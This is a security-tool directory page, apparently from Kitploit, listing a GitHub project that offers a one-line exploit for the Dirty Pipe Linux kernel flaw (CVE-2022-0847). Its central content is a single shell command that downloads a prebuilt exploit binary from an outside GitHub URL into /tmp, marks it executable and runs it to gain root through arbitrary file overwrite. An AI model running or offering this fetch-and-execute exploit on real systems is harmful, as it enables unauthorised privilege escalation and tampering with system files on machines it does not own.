Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/crowsec-edtech/dirty-pipe
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubcrowsec-edtech/dirty-pipe

Dirty-Pipe

One-liner exploit for CVE-2022-0847 (Dirty Pipe) Linux kernel vulnerability enabling arbitrary file overwrite and privilege escalation via a single curl-pipe command.

View Repository
974 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Oneline Exploit CVE-2022-0847

root@kitploit:~
{curl,-s,-k,https://raw.githubusercontent.com/carlosevieira/Dirty-Pipe/main/exploit-static,-o,/tmp/exploit-dirty-pipe};{chmod,+x,/tmp/exploit-dirty-pipe};/tmp/exploit-dirty-pipe
Download Tool